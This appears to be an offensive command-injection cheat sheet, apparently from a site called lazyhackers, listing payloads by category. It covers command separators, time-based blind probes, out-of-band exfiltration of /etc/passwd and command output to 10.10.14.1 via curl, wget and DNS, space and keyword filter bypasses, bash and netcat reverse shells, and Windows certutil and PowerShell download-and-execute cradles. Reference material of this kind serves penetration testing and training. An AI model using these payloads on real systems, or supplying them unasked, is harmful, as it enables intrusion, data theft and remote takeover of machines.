
Command Injection

OS command injection — separators and substitution, blind/time-based detection, OOB exfiltration, space/keyword/WAF bypasses, reverse shells and Windows command injection.

May 2026, lazyhackers
Separators (8)
; id
Chain a second command (semicolon)
separator unix
| id
Pipe into the injected command
separator
|| id
Run only if the first command fails
separator
& id
Background separator (also Windows)
separator
&& id
Run if the first command succeeds
separator
`id`
Backtick command substitution
substitution unix
$(id)
Modern command substitution
substitution unix
%0aid
URL-encoded newline as a separator
separator encoding
Blind / Time-Based (4)
; sleep 5
Confirm blind injection via a delay (Unix)
blind time
$(sleep 5)
Time delay via substitution
blind time
; ping -c 5 127.0.0.1
Unix delay via ping
blind time
& ping -n 5 127.0.0.1
Windows delay via ping
blind time windows
Out-of-Band Exfil (4)
; curl http://10.10.14.1/$(whoami)
Exfil command output via an HTTP callback
oob exfil
; nslookup `whoami`.10.10.14.1
DNS exfil of command output
oob dns
; curl --data @/etc/passwd http://10.10.14.1/
POST a file to your listener
oob exfil
; wget http://10.10.14.1/$(id|base64)
Base64 the output to survive URL/DNS rules
oob encoding
Space & Keyword Bypass (6)
cat${IFS}/etc/passwd
${IFS} substitutes for a blocked space
bypass space
{cat,/etc/passwd}
Brace expansion avoids spaces
bypass space
cat</etc/passwd
Input redirection instead of a space
bypass space
c''at /et''c/pa''sswd
Empty quotes break keyword matching
bypass quotes
/???/?at /etc/passwd
Glob wildcards avoid literal binary names
bypass wildcard
echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash
Base64-decode then execute
bypass base64
Reverse Shells (3)
; bash -i >& /dev/tcp/10.10.14.1/4444 0>&1
Bash reverse shell
revshell bash
; nc -e /bin/bash 10.10.14.1 4444
Netcat reverse shell
revshell nc
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.1 4444 >/tmp/f
Netcat (no -e) FIFO reverse shell
revshell nc fifo
Windows (4)
& whoami
Windows command separator
windows separator
& certutil -urlcache -f http://10.10.14.1/s.exe s.exe & s.exe
Download + execute a payload (certutil)
windows download
& powershell -enc <BASE64>
Run an encoded PowerShell command
windows powershell
& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.1/s.ps1')"
PowerShell download-cradle
windows powershell cradle